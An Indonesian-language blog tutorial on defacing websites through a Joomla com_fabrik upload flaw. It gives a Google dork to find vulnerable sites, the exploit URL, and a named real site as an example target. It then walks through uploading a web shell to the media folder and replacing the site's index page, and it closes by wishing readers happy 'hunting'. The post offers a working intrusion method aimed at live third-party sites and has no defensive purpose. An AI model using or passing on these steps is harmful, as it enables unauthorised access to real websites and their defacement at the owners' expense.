Selamat sore broo kali ini ane mau berbagi tentang deface hehe
Untuk para master atau mastah hacker khususnya defacer, pasti sudah tidak asing lagi Exploit com_fabrik. Namun untuk newbie seperti ane pasti masih clingak-clinguk. Maka dari itu ane mau berbagi sesuatu bagi yang belom tau :)
Oke, untuk yang belum tahu disimak ya :)
Dork :
inurl:"index.php?option=com_fabrik"site:.uk (bisa dikembangkan sendiri)
Exploit :
index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher
Langkah-langkahnya :
Buka GOOGLE
Masukkan Dorknya tadi
inurl:"inurl:"index.php?option=com_fabrik"site:.uk"
Pilih target. Misal kita mendapat http://www.case-stores.de/index.php?option=com_fabrik&lang=de
Setelah menemukan target, ganti (exploitasi) URLnya hingga menjadi
http://www.case-stores.de/index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher
maka hasil nya seperti ini ,kalo tidak seperti ini mending cari yang lain :)
seperti gambar di bawah ini :
Upload shell ente atau kalo belom punya bisa ambil dari artikel saya :)
Untuk mengetahui letak shell nya di mana www.target.com/media/namashellkamu.php ( itu kalo nama shell ente shell )
dan jika sukses manggil shell nya akan seperti gambar di bawah ini :
Seperti ini ,sekarang kita udah masuk ke web tersebut tinggal ganti index nya :)
kalo udah gitu tinggal tebas index nya dan ganti make script kalian deh :D
Dan taraaaaaaaa anda telah berhasil mendeface web tersebut :)
Mudah banget kan ??? :)
Oke, selamat berburu....
Wassalamualaikum Wr.Wb
Mudah banget kan ??? :)
Oke, selamat berburu....
Wassalamualaikum Wr.Wb
Tidak ada komentar:
Posting Komentar